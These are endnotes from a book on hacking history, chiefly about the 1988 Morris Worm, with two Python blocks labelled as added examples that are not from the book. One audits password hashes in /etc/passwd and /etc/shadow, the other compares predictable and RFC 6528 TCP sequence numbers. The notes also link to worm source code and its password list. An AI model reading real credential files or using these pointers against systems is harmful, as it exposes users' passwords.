“must be wrong”: Testimony of Paul Graham, USA v. Robert Tappan Morris transcript, 986.
11:00 p.m., November 2: All times are EST.
Ithaca, New York: Testimony of Dawson Dean, Morris transcript, 574. The current home is Bill & Melinda Gates Hall.
a computer “worm”: Donn Seeley has the time down as 6:00 p.m. PST, which is 9:00 p.m. EST. He notes, “11/21: 1800 (approx.): This date and time were seen on worm files found on prep.ai.mit.edu … The files were removed later, and the precise time was lost. System logging on prep had been broken for two weeks. The system doesn’t run accounting and the disks aren’t backed up to tape: a perfect target.” Donn Seeley, “A Tour of the Worm,” 1988, http://www.cs.unc.edu/~jeffay/courses/nidsS05/attacks/seely-RTMworm-89.html. At trial, Robert Morris Jr. testified, “I released it, I think, at about eight o’clock that night.” Morris transcript, 1097. Dawson Dean reported seeing Robert at a Sun terminal “in late evening so it would be around 8 o’clock.” Morris transcript, 874.
University of Pittsburgh: Eugene Spafford, “The Internet Worm Program: An Analysis,” Purdue Technical Report CSD-TR-823, November 29, 1988, 2, https://spaf.cerias.purdue.edu/tech-reps/823.pdf.
Whack-a-Worm: For chronology, see Seeley, “A Tour of the Worm,” 2.
“machines were crashing”: Testimony of Dean Krafft, Morris transcript, 132.
disconnect the department computers: Krafft, Morris transcript, 134.
Bell Labs: John Markoff, “How a Need for Challenge Seduced Computer Expert,” The New York Times, November 6, 1988.
“under attack”: Email, The “Security Digest” Archives, https://web.archive.org/web/20041124203457/securitydigest.org/tcp-ip/archive/1988/11.
hostile foreign power: See, e.g., Testimony of Michael Muuss, Morris transcript, 873.
“‘This is the catastrophe’”: Lawrence M. Fisher, “On the Front Lines in Battling Electronic Invader,” The New York Times, November 5, 1988.
shy and awkward young man: See, e.g., John Markoff, “Author of Computer ‘Virus’ Is Son of N.S.A. Expert on Data Security,” The New York Times, November 5, 1988.
installed a remote terminal: Katie Hafner and John Markoff, Cyberpunk: Outlaws and Hackers on the Computer Frontier (New York: Simon and Schuster, 1991), 265.
sold by Radio Shack: Lily Rothman, “The Personal Computer That Beat Apple (for a While),” Time, August 3, 2015, time.com/3968790/tandy-trs-80-history.
TRS-80 retailed: See, e.g., advertisement in Byte, June 1977, 15, https://archive.org/details/byte-magazine-1977-06/page/n15/mode/2up?view=theater.
cassette tapes: On the use of audio cassettes for storage, see Stan Viet, Stan Viet’s History of the Personal Computer (Asheville, NC: Worldcomm, 1993), 80.
to our safety?: See, e.g., Riley de León, “50% of U.S. Tech Execs Say State-Sponsored Cyber Warfare Their Biggest Threat: CNBC Survey,” CNBC, December 17, 2020, https://www.cnbc.com/2020/12/17/50percent-of-tech-execs-say-cyber-warfare-biggest-threat-cnbc-survey.html.
developed until 1992: Thom Holwerda, “The World’s First Graphical Browser: Erwise,” OS News, March 3, 2009, https://www.osnews.com/story/21076/the-worlds-first-graphical-browser-erwise/.
half of all property crimes: Maria Tcherni, Andrew Davies, Giza Lopes, and Alan Lizotte, “The Dark Figure of Online Property Crime: Is Cyberspace Hiding a Crime Wave?,” Justice Quarterly 33, no. 5 (2016): 890–911; Ross Anderson et al., “Measuring the Changing Cost of Cybercrime.” The 18th Annual Workshop on the Economics of Information Security, 2019, https://www.repository.cam.ac.uk/handle/1810/294492.
$600 billion to $6 trillion: Compare James Lewis, “Economic Impact of Cybercrime—No Slowing Down,” February 2018, 6 (“$445 billion to $600 billion”), https://csis-website-prod.s3.amazonaws.com/s3fs-public/publication/economic-impact-cybercrime.pdf, to Steve Morgan, “Global Cybercrime Damages Predicted to Reach $6 Trillion Annually by 2021,” Cybercrime Magazine, October 26, 2020, https://cybersecurityventures.com/annual-cybercrime-report-2020/. These are global estimates. See also Paul Dreyer et al., “Estimating the Global Cost of Cyber Risk,” RAND Corporation, January 14, 2018, https://www.rand.org/pubs/research_reports/RR2299.html (“the global cost of cyber crime has direct gross domestic product [GDP] costs of $275 billion to $6.6 trillion and total GDP costs [direct plus systemic] of $799 billion to $22.5 trillion [1.1 to 32.4 percent of GDP].”). Note that actual reports in the United States differ from these estimates by at least two orders of magnitude. “In 2021, IC3 [FBI Internet Crime Complaint Center] continued to receive a record number of complaints from the American public: 847,376 reported complaints, which was a 7% increase from 2020, with potential losses exceeding $6.9 billion.” Internet Crime Complaint Center, Federal Bureau of Investigation Internet Crime Report 2021, 3, https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf.
“greatest threat”: Steve Morgan, “IBM’s CEO on Hackers: ‘Cyber Crime Is the Greatest Threat to Every Company in the World,’” Forbes, November 24, 2015, https://www.forbes.com/sites/stevemorgan/2015/11/24/ibms-ceo-on-hackers-cyber-crime-is-the-greatest-threat-to-every-company-in-the-world/?sh=2776a87973f0.
ransomware attack on my publisher’s: Carly Page, “US Publisher Macmillan Confirms Cyberattack Forced Systems Offline,” TechCrunch, July 1, 2022, https://techcrunch.com/2022/07/01/publisher-macmillan-ransomware.
SolarWinds: Ellen Nakashima and Craig Timberg, “Russian Government Spies Are Behind a Broad Hacking Campaign That Has Breached US Agencies and a Top Cyber Firm,” The Washington Post, December 13, 2020.
Even Microsoft was compromised: Thomas Brewster, “DHS, DOJ and DOD Are All Customers of SolarWinds Orion, the Source of the Huge Government Hack,” Forbes, December 14, 2020, https://www.forbes.com/sites/thomasbrewster/2020/12/14/dhs-doj-and-dod-are-all-customers-of-solarwinds-orion-the-source-of-the-huge-us-government-hack/?sh=20fce79d25e6.
“the largest and most sophisticated attack”: Brad Heath, “SolarWinds Hack Was ‘Largest and Most Sophisticated Attack’ Ever—Microsoft President,” Reuters, February 15, 2021, https://news.yahoo.com/solarwinds-hack-largest-most-sophisticated-020634680-100447916.html.
15 billion: The 15 billion figure includes only Internet of Things devices. See Lionel Sujay Vailshery, “Number of IoT Connected Devices Worldwide 2019–2021, with Forecasts to 2030,” Statista, August 22, 2022, https://www.statista.com/statistics/1183457/iot-connected-devices-worldwide.
Security—whether it be: On the uses of “security” in debates over internet governance, see Josephine Wolff, “What We Talk About When We Talk About Cybersecurity: Security in Internet Governance Debates,” Internet Policy Review 5, no. 3 (2016).
and stronger encryption: As I have since learned, properly implemented, well-studied cryptography is pretty much never broken. Hacking is less about breaking encryption than breaking something around the encryption in order to sidestep it.
50 million lines of code: “Windows 10 Lines of Code,” Microsoft, 2020, https://answers.microsoft.com/en-us/windows/forum/all/windows-10-lines-of-code/a8f77f5c-0661-4895-9c77-2efd42429409.
Turing Test: Turing set out his test for intelligence in Alan Turing, “Computing Machinery and Intelligence,” Mind 59, no. 236 (October 1950): 433–60. A Turing Test has a human judge and a computer subject attempting to appear human. A “reverse” Turing Test has a computer judge and a human subject trying to appear human. CAPTCHA—the irritating image-recognition challenge that websites use for detecting bots—stands for “Completely Automated Public Turing test to tell Computers and Humans Apart.”
principles of metacode: Alan Turing, “On Computable Numbers with an Application to the Entscheidungsproblem,” Proceedings of the London Mathematical Society, 1936, 230–65.
solvable problem: Computers cannot solve every problem, because, as Turing showed, and as I will explain in the Epilogue, most problems are not solvable by computers, humans, or any computational device that uses finite procedures.
Cybercrime is a business: Cyberespionage, and in particular nation-state cyberespionage, differs from cybercrime in that attackers have near-infinite resources to spend targeting their adversaries. On cyberespionage, see chapter 8.
spy on you making dinner: Sadly, it does happen. See, e.g., Nate Anderson, “Meet the Men Who Spy on Women Through Their Webcams,” Ars Technica, February 10, 2013, https://arstechnica.com/tech-policy/2013/03/rat-breeders-meet-the-men-who-spy-on-women-through-their-webcams/.
“hack your heart”: See “Hackers Can Access Your Pacemakers, but Don’t Panic Just Yet,” Healthline, April 4, 2019, https://www.healthline.com/health-news/are-pacemakers-defibrillators-vulnerable-to-hackers.
CNN reported on: Matt McFarland, “Teen’s Tesla Hack Shows How Vulnerable Third-Party Apps May Make Cars,” CNN Business, February 2, 2022, https://www.cnn.com/2022/02/02/cars/tesla-teen-hack/index.html.
Cyber 9/11: See, e.g., John Arquilla and David Ronfeldt, “Cyberwar Is Coming!,” Comparative Strategy 12, no. 2 (Spring 1993): 141–65. Richard Clarke coined the term Digital Pearl Harbor: see “Seven Questions: Richard Clarke on the Next Cyber Pearl Harbor,” Foreign Policy, April 2, 2008, foreignpolicy.com/2008/04/02/seven-questions-richard-clarke-on-the-next-cyber-pearl-harbor/; Lisa Vaas, “Is Digital Pearl Harbor THE Most Tasteless Term in IT Security?,” Naked Security by Sophos (blog), February 9, 2012, https://nakedsecurity.sophos.com/2012/02/09/digital-pearl-harbor/.
the “perfect weapon”: David E. Sanger, The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age (New York: Crown, 2018).
the truth is less dramatic: To be clear, David Sanger’s book is excellent, and I highly recommend it, for both the reporting and the writing.
malware that functions: Sophisticated malware may be “cross-platform,” meaning it can run on more than one operating system. For example, according to CrowdStrike, the Russian malware known as X-Agent, which we will encounter in chapter 8, “is a cross platform remote access toolkit, variants have been identified for various Windows operating systems, Apple’s iOS, and likely the MacOS.” Adam Meyers, “Danger Close: Fancy Bear Tracking of Ukrainian Field Artillery Units,” CrowdStrike (blog), December 22, 2016. Though such cases are rare, there have been vulnerabilities that are serious precisely because they sit in pervasive protocols and services. See, e.g., the Heartbleed bug (2014), http://www.heartbleed.com, and the Log4J vulnerability (2021), https://nvd.nist.gov/vuln/detail/CVE-2021-44228.
beleaguered networks: See, e.g., Nominet Cyber Security, Life Inside the Perimeter: Understanding the Modern CISO, 2019, https://media.nominet.uk/wp-content/uploads/2019/02/12130924/Nominet-Cyber_CISO-report_FINAL-130219.pdf. Seventeen percent said that they had turned to medication or alcohol to help deal with stress.
learned helplessness: Steven F. Maier and Martin E. P. Seligman, “Learned Helplessness at Fifty: Insights from Neuroscience,” Psychological Review 123, no. 4 (2016): 349–67, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4920136/.
five hacks: Some hacks have been extensively discussed by others, so I did not tell those stories again; e.g., STUXNET, in Kim Zetter, Countdown to Zero Day: STUXNET and the Launch of the World’s First Digital Weapon (New York: Crown, 2014); Conficker, in Mark Bowden, Worm: The First Digital World War (New York: Grove Press, 2012); Dark Energy, in Andy Greenberg, Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin’s Most Dangerous Hackers (New York: Doubleday, 2019).
“There is not one”: John Markoff, “‘Virus’ in Military Computers Disrupts Systems Nationwide,” The New York Times, November 4, 1988.
Andy sent out: Email, The “Security Digest” Archives, https://web.archive.org/web/20041124203457/securitydigest.org/tcp-ip/archive/1988/11.
for forty-eight hours: David Stipp, “First Computer Message on Stopping Virus Took 48 Hours to Reach Target,” The Wall Street Journal, November 8, 1988. On the path taken by Sudduth’s email, see Jon A. Rochlis and Mark W. Eichin, “With Microscope and Tweezers: The Worm from MIT’s Perspective,” Communications of the ACM 32, no. 6 (1989): 690–91.
“Can I talk to Dad?”: Katie Hafner and John Markoff, Cyberpunk: Outlaws and Hackers on the Computer Frontier (New York: Simon and Schuster, 1991), 311.
Atlantic City … unironically: Papers were presented at the Spring Joint Computer Conference in Atlantic City, April 18–20, 1967, sponsored by the New Jersey branch of the American Federation of Information Processing Societies. Papers included Bernard Peters, “Security Considerations in a Multi-programmed Computer System,” Spring Joint Computer Conference, 1967, http://www.ukcert.org.uk/SecurityConsiderationsInMulti-ProgrammedComputerSystem_p283-Peters.pdf; Willis H. Ware, “Security and Privacy in Computer Systems”; and H. E. Peterson and R. Turn, “System Implications of Information Privacy.” ARPA also commissioned a report on computer security in 1967, eventually published in 1970 as “Security Controls for Computer Systems: Report of Defense Science Board Task Force on Computer Security,” https://csrc.nist.gov/csrc/media/publications/conference-paper/1998/10/08/proceedings-of-the-21st-nissc-1998/documents/early-cs-papers/ware70.pdf.
soccer field: Tom van Vleck, “My Experience with the IBM 7094 and CTSS,” 1995, https://www.multicians.org/thvv/tvv7094.html.
“mainframe” computers: Paul E. Ceruzzi, A History of Modern Computing, 2nd ed. (Cambridge, MA: MIT Press, 2002), 71.
cost $3 million: “A typical 7094 sold for $3,134,500.” IBM Archives FAQ at https://www.ibm.com/ibm/history/reference/faq_0000000011.html.
IBM’s president: David Walden and Tom van Vleck, eds., “Compatible Time-Sharing System (1961–1973): Fiftieth Anniversary Commemorative Overview,” IEEE Computer Society, June 2011, 6. IBM offered a 40 percent discount to universities for their smaller Model 650 provided that they offered a business data processing or computer science course, 60 percent for those offering both. Thomas J. Watson Jr., Father, Son & Co. (New York: Bantam Books, 1990), 244.
the previous user was gone: User data still existed on peripheral storage, so it was possible for another job to access it. But this would have to be done in front of a computer operator, making detection easier.
“Corby” Corbató: Fernando Corbató, “On Building Systems That Will Fail,” Communications of the ACM, September 1991, https://dl.acm.org/doi/abs/10.1145/114669.114686.
Compatible Time-Sharing System: See Fernando Corbató et al., The Compatible Time-Sharing System: A Programmers Guide, MIT Computer Center, 1963, http://www.bitsavers.org/pdf/mit/ctss/CTSS_ProgrammersGuide.pdf. CTSS was “compatible” because it could still be used for batch processing.
“time-sharing”: On the provenance of time-sharing, and the different meanings attached to the term, see John McCarthy, “Reminiscence on the Theory of Time-Sharing,” Winter or Spring 1983, http://jmc.stanford.edu/computing-science/timesharing.html. “Shortly after the first paper on time-shared computers by C. Strachey at the June 1959 UNESCO Information Processing conference, H.M. Teager and J. McCarthy delivered an unpublished paper ‘Time-Shared Program Testing’ at the August 1959 ACM Meeting.” Corbató et al., The Compatible Time-Sharing System.
IBM 7094: Donald MacKenzie and Garrel Pottinger, “Mathematics, Technology, and Trust: Formal Verification, Computer Security, and the U.S. Military,” IEEE Annals of the History of Computing 19, no. 3 (1997): 42.
Hell, as Jean-Paul Sartre: Jean-Paul Sartre, Huis Clos (1944) (“l’enfer c’est les autres”).
illusion of single use: Though the first version of CTSS could run several jobs simultaneously, it could hold only one program in core memory at a time. It would have to swap out memory to disk for each toggle between jobs. Later iterations loaded multiple jobs into memory at the same time.
less precious computer memory: Robert McMillan, “The World’s First Computer Password? It Was Useless Too,” Wired, January 27, 2012, https://www.wired.com/2012/01/computer-password.
UACCNT.SECRET: Walden and van Vleck, “Compatible Time-Sharing System (1961–1973),” 36–37.
six years of development: Two years earlier, IBM introduced a time-sharing system for its 360 series. Emerson Pugh, Lyle Johnson, and John Palmer, IBM’s 360 and Early 370 Systems (Cambridge, MA: MIT Press, 1991), 362–63.
switching to time-sharing: P. A. Karger and R. R. Schell, “Thirty Years Late: Lessons from the Multics Security Evaluation,” Eighteenth Annual Computer Security Applications Conference, 2002, https://www.acsac.org/2002/papers/classic-multics.pdf.
the evaluation concluded: Paul Karger and Roger Schell, “Multics Security Evaluation: Vulnerability Analysis,” June 1974, https://www.acsac.org/2002/papers/classic-multics-orig.pdf.
IBM mainframe: See, e.g., Digital Equipment Corporation, Nineteen Fifty-Seven to the Present, 1978, http://gordonbell.azurewebsites.net/digital/dec%201957%20to%20present%201978.pdf.
to form “scripts”: Doug McIlroy, E. N. Pinson, and B. A. Tague, “Unix Time-Sharing System: Foreword,” Bell System Technical Journal, July 8, 1978, 1902–3.
changed to UNIX: Brian Kernighan is reputed to have changed the name to UNIX, though he cannot remember whether he did. Peter Salus, A Quarter Century of UNIX (Boston: Addison-Wesley, 1994), 9.
UNIX was a massive success: The system was already well developed before v1 appeared in 1971. And not until v4 was the system first described in public. See, e.g., Douglas McIlroy, A Research UNIX Reader: Annotated Excerpts from the Programmer’s Manual, 1971–1986, https://www.cs.dartmouth.edu/~doug/reader.pdf.
direct descendant: See chart at upload.wikimedia.org/wikipedia/commons/7/77/Unix_history-simple.svg.
“The first fact to face”: Dennis Ritchie, “On the Security of UNIX,” UNIX Programmer’s Manual, Volume 2 (Murray Hill, NJ: Bell Telephone Laboratories, 1979), 592.
UNIX gave users greater privileges: Matt Bishop wrote a UNIX security report in 1981 listing twenty-one vulnerabilities falling into six categories. See Matt Bishop, “Reflections on UNIX Vulnerabilities,” Annual Computer Security Applications Conference, 2009.
Louis Harris & Associates: Survey by Southern New England Telephone, September 1–11, 1983, national adult sample of 1,256. Data provided by the Roper Center for Public Opinion Research, University of Connecticut, cited in Susannah Fox and Lee Rainie, “The Web at 25, Part 1: How the Internet Has Woven Itself into American Life,” Pew Research Center, February 27, 2014, https://www.pewresearch.org/internet/2014/02/27/part-1-how-the-internet-has-woven-itself-into-american-life/#fn-10743-2.
The movie WarGames: Fred Kaplan, “‘WarGames’ and Cybersecurity’s Debt to a Hollywood Hack,” The New York Times, February 20, 2016.
WarGames: Scott Brown, “WarGames: A Look Back at the Film That Turned Geeks and Phreaks into Stars,” Wired, July 21, 2008, https://www.wired.com/2008/07/ff-wargames/?currentPage=all.
“Man is in the loop”: Rick Inderfurth, “WarGames,” ABC Evening News, July 8, 1983.
“relax and enjoy the film”: John Chancellor, “WarGames,” NBC Nightly News, July 13, 1983.
look into it: Kaplan, “‘WarGames’ and Cybersecurity’s Debt.”
NSDD-145: National Security Decision Directive Number 145, National Policy on Telecommunications and Automated Information Systems Security, September 17, 1984, https://irp.fas.org/offdocs/nsdd145.htm.
address “cybercrime”: The federal government itself was the largest consumer of computer products and services and wanted legislation to protect government computers. Glenn J. McLoughlin, “Computer Security Issues: The Computer Security Act of 1987,” CRS Issue Brief IB87164, 1988, 1.
“We’re gonna show about four minutes”: Hearings Before the Subcommittee on Transportation, Aviation and Materials of the Committee on Science and Technology, U.S. House of Representatives, Ninety-Eighth Congress, Monday, September 26, 1983, 1. For insightful discussion, see Stephanie R. Schulte, “‘The WarGames Scenario’: Regulating Teenagers and Teenaged Technology (1980–1984),” Television & New Media 9, 487 (2008).
Counterfeit Access Device and Computer Fraud and Abuse Act: P.L. 98–473, 98 Stat. 2190, later codified at 18 USC §1030. This statute limited the criminal offense to three specific scenarios—unauthorized access to obtain national security secrets, personal financial records from financial institutions or credit agencies, and hacking into government computers.
devoted his lecture to cybersecurity: Kenneth Thompson, “Reflections on Trusting Trust,” Communications of the ACM, August 1984, https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_ReflectionsonTrustingTrust.pdf. The Turing lecture series was inaugurated in 1967.
air force testers: Karger and Schell provided the first public description of the problem that compilers can insert malicious code into themselves. Karger and Schell noted in their examination of Multics vulnerabilities that a “penetrator could insert a trap door into the … compiler … [and] since the PL/I compiler is itself written in PL/I, the trap door can maintain itself, even when the compiler is recompiled.” Karger, “Multics Security Evaluation,” 52.
do the same to UNIX: David Wheeler proposed a countermeasure against the Thompson attack using two different compilers, in David Wheeler, Fully Countering Trusting Trust Through Diverse Double-Compiling (PhD diss., George Mason University, 2009), https://dwheeler.com/trusting-trust/dissertation/html/wheeler-trusting-trust-ddc.html.
“only program you can truly trust”: Thompson, “Reflections on Trusting Trust.”
appearing on: Patrick was also a witness at the congressional cybersecurity hearings. When asked by a member of the subcommittee whether WarGames was an inspiration, Patrick disappointed: “That didn’t instigate us at all.” Many hackers, however, have since claimed that the movie was indeed their first inspiration. See Douglas Thomas, Hacker Culture (Minneapolis: University of Minnesota Press, 2002), 26.
his friends were just novices: The 414 Club mainly exploited default passwords they learned from instruction manuals. Alex Orlando, “The Story of the 414s: The Milwaukee Teenagers Who Became Hacking Pioneers,” Discover, October 10, 2020, https://www.discovermagazine.com/technology/the-story-of-the-414s-the-milwaukee-teenagers-who-became-hacking-pioneers.
$250,000 fine: On the subsequent crackdown by law enforcement, see Bruce Sterling, The Hacker Crackdown: Law and Disorder on the Electronic Frontier (New York: Bantam Books, 1992).
Robert Morris Sr.: “Bob (Robert) Morris stepped in wherever mathematics was involved, whether it was numerical analysis or number theory. Bob invented the distinctively original utilities typo, and dc-HE (with Lorinda Cherry), wrote most of the math library, and wrote primes and factor (with Thompson). His series of crypt programs fostered the Center’s continuing interest in cryptography.” M. Douglas McIlroy, “A Research UNIX Reader: Annotated Excerpts from the Programmer’s Manual, 1971–1986,” https://www.cs.dartmouth.edu/~doug/reader.pdf.
long, graying beard: John Markoff, “Robert Morris, Pioneer in Computer Security, Dies at 78,” The New York Times, June 29, 2011.
“For a cryptographer”: Michael Wines, “A Youth’s Passion for Computers, Gone Sour,” The New York Times, November 11, 1988.
“not a career plus”: Wines, “A Youth’s Passion for Computers, Gone Sour.”
“The case, with all its bizarre twists”: John Markoff, “How a Need for Challenge Seduced Computer Expert,” The New York Times, November 6, 1988.
Through Finger, a now-defunct: It was Cliff Stoll’s idea to run the Finger request. He told Markoff the results over the phone. Hafner and Markoff, Cyberpunk, 261.
“I had a feeling”: Markoff, “Author of Computer ‘Virus’ Is Son of N.S.A. Expert on Data Security,” The New York Times, November 5, 1988.
at the state level: In United States v. Seidlitz, 589 F.2d 152 (4th Cir., 1978), Seidlitz was a former employee who used a coworker’s username and password to access his old employer’s network and download valuable software to start a competitor business. Though Seidlitz was prosecuted under the federal wire fraud statute—the CFAA didn’t exist then—he was prosecuted for hacking. As Orin Kerr pointed out to me, Seidlitz should be considered the first computer crime prosecution.
“Robert may have been”: Hafner and Markoff, Cyberpunk, 318–19.
binary strings represent specific instructions: More technically, it means move 2 into the lower 8-bit accumulator (mov 2, AL), then add 2 to the lower accumulator (add 2, AL) and store the sum there.
compilation process: Because the source code was reverse engineered and decompiled, there are different versions of the Morris Worm source code. I used the source code at https://github.com/arialdomartini/morris-worm.
bootstrap code to other nodes: The worm had a preference for internet gateways: once it got a toehold on a gateway, it could jump onto the internet to infect other networks.
written by Bob Morris: See, e.g., David Feldmeier and Philip Karn, “Unix Password Security—Ten Years Later,” Advances in Cryptology—CRYPTO ’89 Proceedings, 1989, https://link.springer.com/chapter/10.1007/0-387-34805-0_6.
the password file: At the time, UNIX stored obfuscated passwords in /etc/passwd. In modern UNIX-like systems, however, /etc/passwd contains user information, while the obfuscated passwords are stored in /etc/shadow with read/write privileges only to the root user.
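The split between /etc/passwd and /etc/shadow described in this note is easy to audit mechanically. The following is an added example, not code from the book or from any of the sources it cites: it parses constructed passwd(5)- and shadow(5)-format records (the hash strings and user names are made up) and reports, for each account, whether its credential still sits world-readable in the passwd file, as in 1988, whether it has been moved to the root-only shadow file, or whether the account is locked or has no password at all.

```python
"""Added example: audit where a UNIX-like system keeps its password hashes.
All records below are constructed; the hash values are placeholders."""

# Constructed /etc/passwd records (name:pw:uid:gid:gecos:home:shell).
# The "legacy" account still carries its hash in the passwd file itself.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
legacy:E8abKI2zqWd1E:1001:1001:Old-style account:/home/legacy:/bin/sh
alice:x:1002:1002:Alice:/home/alice:/bin/bash
svc:x:1003:1003:Service account:/var/lib/svc:/usr/sbin/nologin
"""

# Constructed /etc/shadow records (name:hash:lastchg:min:max:warn:inactive:expire:reserved).
SHADOW_SAMPLE = """\
root:$6$constructedsalt$constructedhashvalue:19700:0:99999:7:::
alice:$y$j9T$constructedsalt$constructedhashvalue:19700:0:99999:7:::
svc:*:19700:0:99999:7:::
"""


def parse_passwd(text):
    """Return {username: fields} for passwd(5) lines."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, pw, uid, gid, gecos, home, shell = parts
        users[name] = {"pw": pw, "uid": int(uid), "gid": int(gid),
                       "gecos": gecos, "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """Return {username: hash_field} for shadow(5) lines (other fields ignored)."""
    hashes = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        hashes[parts[0]] = parts[1]
    return hashes


def audit(passwd_text, shadow_text):
    """Classify each account by where its credential lives and whether it is usable."""
    findings = {}
    shadow = parse_shadow(shadow_text)
    for name, user in parse_passwd(passwd_text).items():
        pw = user["pw"]
        if pw == "x":                      # passwd defers to /etc/shadow
            h = shadow.get(name)
            if h is None:
                findings[name] = "shadowed-but-missing"
            elif h == "":
                findings[name] = "empty-password"
            elif h == "*" or h.startswith("!"):
                findings[name] = "locked"
            else:
                findings[name] = "shadowed"   # hash readable by root only
        elif pw == "":
            findings[name] = "empty-password"
        else:
            findings[name] = "hash-in-passwd"  # world-readable hash, the 1988 situation
    return findings


if __name__ == "__main__":
    for account, status in audit(PASSWD_SAMPLE, SHADOW_SAMPLE).items():
        print(f"{account:8s} {status}")
```

Run against a real system, `audit(open("/etc/passwd").read(), open("/etc/shadow").read())` needs root to read the shadow file, which is exactly the protection the note describes; any account reported as "hash-in-passwd" or "empty-password" is the finding to act on.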
four hundred commonly used passwords: A full list of passwords can be found in the cracksome.c source code, lines 270–375, https://github.com/arialdomartini/morris-worm/blob/master/cracksome.c.
nine times faster: Source code for the worm’s version of crypt, called wormdes.c, https://github.com/arialdomartini/morris-worm/blob/master/wormdes.c. “While the standard crypt() takes 54 seconds to encrypt 271 passwords on our 8600 (the number of passwords actually contained in our password file), the worm’s crypt() takes less than 6 seconds.” Donn Seeley, “A Tour of the Worm,” http://www.cs.unc.edu/~jeffay/courses/nidsS05/attacks/seely-RTMworm-89.html.
“You idiot”: Graham testimony Morris transcript, 991. Cf. Hafner and Markoff, Cyberpunk, 302 (“You jerk”). The worm code contained additional bugs that failed to limit reinfection. See, e.g., “Tour of the Worm,” Section 4.3, “Population Growth.”
“the Internet”: Markoff, “Author of Computer ‘Virus’ Is Son of N.S.A. Expert on Data Security”; “Spreading a Virus,” The Wall Street Journal, November 7, 1988; Joel Dresang and Mike Kennedy, “‘Business as Usual’ After Virus,” USA Today, November 8, 1988; Philip J. Hilts, “Virus Hits Vast Computer Network; Thousands of Terminals Shut Down to Halt Malicious Program,” The Washington Post, November 4, 1988.
(SATNET): Vinton G. Cerf and Robert E. Kahn, “A Protocol for Packet Network Intercommunication,” IEEE Transactions on Communications 22, 5 (May 1974). For a comprehensive description of TCP/IP, see W. Richard Stevens, Kevin R. Fall, and Gary R. Wright, TCP/IP Illustrated, vol. 1: The Protocols (Boston: Addison-Wesley Longman, 1994). On the history of the internet and the development of TCP/IP, see Janet Abbate, Inventing the Internet (Cambridge, MA: MIT Press, 2000), and Katie Hafner and Matthew Lyon, Where the Wizards Stay Up Late: The Origin of the Internet (New York: Simon and Schuster, 1996).
The internet works: The description that follows is highly simplified. A more accurate description would be: My Yale email client makes a MAPI (Messaging Application Programming Interface) over HTTPS connection to Microsoft Office 365 to deposit the mail into the Office 365 email infrastructure. Microsoft’s outbound servers would look up the MX (Mail Exchange) record for Stanford and route the mail through a series of routers until it reaches Stanford’s MX servers and my friend’s email client. Email correspondence with John Coleman, director of Security Risk and Engineering, October 1, 2022.
Port 25: In modern configuration, email clients often communicate with the mail submission agents (i.e., your “Outbox”) across port 587. Mail submission agents then communicate with mail transfer agents (your “Sent Mail”) across port 25.
sequence number: In reality, sequence numbers in TCP never start at 1. Robert Morris actually wrote a paper on why doing so would be a bad idea: Robert T. Morris, “A Weakness in the 4.2 BSD Unix TCP/IP Software,” Computing Science Technical Report 117, AT&T Bell Laboratories, February 1985. Sequence numbers increment based on the amount of data in the TCP packet. The most up-to-date guidance on sequence number starts was published by the IETF in 2012 (https://www.rfc-editor.org/rfc/rfc6528), but each operating system has its own quirky way of doing it.
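To make the point of this note concrete, here is an added example (not code from the book, from Morris’s paper, or from any operating system): a fixed-increment initial sequence number (ISN) generator of the predictable kind that Morris analysed, beside the RFC 6528 construction ISN = M + F(localip, localport, remoteip, remoteport, secretkey), with M a 4-microsecond timer and F the low 32 bits of an MD5 hash, as the RFC suggests. The 128-per-second and 64-per-connection increments are illustrative constants chosen here, not values taken from the page; the secret key and addresses are constructed. A small check shows why a constant stride is the property a defender does not want.

```python
"""Added example: predictable vs. RFC 6528 TCP initial sequence numbers."""
import hashlib
import struct

TWO32 = 1 << 32  # sequence numbers live in a 32-bit space


def fixed_increment_isn(base, seconds, connections, per_second=128, per_conn=64):
    """ISN that grows by a constant per second and per connection opened.
    The constants are an assumption for illustration, not the exact BSD values."""
    return (base + per_second * seconds + per_conn * connections) % TWO32


def rfc6528_isn(local_ip, local_port, remote_ip, remote_port, secret, microseconds):
    """ISN = (M + F(4-tuple, secret)) mod 2^32, M = 4-microsecond timer,
    F = low 32 bits of MD5 over the connection tuple and a host secret."""
    m = (microseconds // 4) % TWO32
    tuple_bytes = "|".join(
        [local_ip, str(local_port), remote_ip, str(remote_port)]
    ).encode()
    f = struct.unpack("<I", hashlib.md5(tuple_bytes + secret).digest()[:4])[0]
    return (m + f) % TWO32


def constant_stride(isns):
    """Return the stride if consecutive ISNs differ by one constant (mod 2^32),
    which is what makes the old scheme guessable; otherwise return None."""
    deltas = {(b - a) % TWO32 for a, b in zip(isns, isns[1:])}
    return deltas.pop() if len(deltas) == 1 else None


if __name__ == "__main__":
    # Five connections opened in the same second from the fixed-increment generator
    old = [fixed_increment_isn(1000, seconds=0, connections=n) for n in range(5)]
    print("fixed-increment ISNs:", old, "stride:", constant_stride(old))

    # Same five connections, RFC 6528 style, with a constructed host secret
    secret = b"constructed-host-secret"
    new = [rfc6528_isn("10.0.0.1", 40000 + n, "10.0.0.2", 25, secret, 8) for n in range(5)]
    print("RFC 6528 ISNs:", new, "stride:", constant_stride(new))
```

Within one connection the number then advances by the payload length, as the note says; what RFC 6528 changes is only the starting point, which is no longer derivable from the clock alone.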
172.3.45.100: There are two widely used forms of IP addressing. Internet Protocol Version 4 (IPv4) is the one used in the text and the most common. It is a 32-bit address (meaning a binary string thirty-two digits long) represented as four decimal numbers, each ranging from 0 to 255, separated by dots. There are 2^32, or 4.2 billion, IPv4 addresses. IPv6 is a 128-bit address, represented as a group of eight hexadecimal numbers (base-16, not base-10 numbers: 0–9, A for 10, B for 11…, and F for 15), each ranging from 0 to 65,535, separated by colons. There are 2^128, or 3.4 × 10^38, possible addresses. For example, the IPv4 address for www.yale.edu is 151.101.2.133; its IPv6 address is 2a04:4e42:0:0:0:0:0:645. (Technically, this IP belongs to Fastly, which protects Yale’s servers.)
